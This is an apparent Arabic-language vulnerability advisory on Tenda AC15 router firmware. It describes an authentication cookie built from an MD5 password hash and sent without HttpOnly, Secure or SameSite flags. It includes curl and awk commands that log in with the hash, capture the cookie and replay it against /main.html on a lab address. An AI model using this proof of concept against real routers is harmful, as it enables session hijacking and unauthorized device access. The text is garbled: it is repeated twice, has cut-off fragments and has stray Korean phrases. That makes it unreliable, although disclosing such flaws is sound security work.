
تعرض كوكيز Tenda AC15
يصدر البرنامج الثابت Tenda AC15 الإصدار V15.03.05.18_multi ملف تعريف ارتباط للمصادقة بالصيغة password=<MD5(password)><6-char suffix> ويعيده دون خصائص HttpOnly أو Secure أو SameSite، مما يعرّض تجزئة كلمة المرور للعميل.
تعمل اللاحقة منخفضة الإنتروبيا كمعرّف جلسة قابل للتوقع، مما يسمح للمهاجمين بإعادة تشغيل الجلسات أو اختطافها.
/login/Auth ملف تعريف ارتباط بالصيغة password=<MD5(password)><6-char suffix>.HttpOnly, Secure, SameSite).document.cookie) وإعادة استخدامه في الطلبات الموجهة إلى /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly وSecure وSameSite إلى ملفات تعريف ارتباط المصادقة.يعمل البرنامج الثابت Tenda AC15 الإصدار V15.03.05.18_multi على إصدار ملف تعريف ارتباط مصادقة بالصيغة password=<MD5(password)><6자리 접미사> ويعيده دون خصائص HttpOnly أو Secure أو SameSite، مما يعرّض تجزئة كلمة المرور للعميل.
تعمل اللاحقة منخفضة الإنتروبيا كمعرّف جلسة قابل للتوقع، مما يتيح إعادة استخدام الجلسة أو اختطافها.
/login/Auth ملف تعريف ارتباط بالصيغة password=<MD5(password)><6자리 접미사>.HttpOnly أو Secure أو SameSite.document.cookie) وإعادة استخدامه عند طلب /main.html.PW_HASH=$(echo -n 'ringzer0' | md5sum | cut -d' ' -f1)
curl -v --compressed -c cookies.txt -D headers.txt -X POST \
"http://192.168.141.128:20080/login/Auth" \
-H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
--data "username=admin&password=${PW_HASH}"
COOKIE=$(awk 'NF && $0!~/^#/ {print $6"="$7; exit}' cookies.txt)
curl -s -i -H "Cookie: ${COOKIE}" "http://192.168.141.128:20080/main.html" | sed -n '1,40p'
HttpOnly وSecure وSameSite على ملفات تعريف ارتباط المصادقة.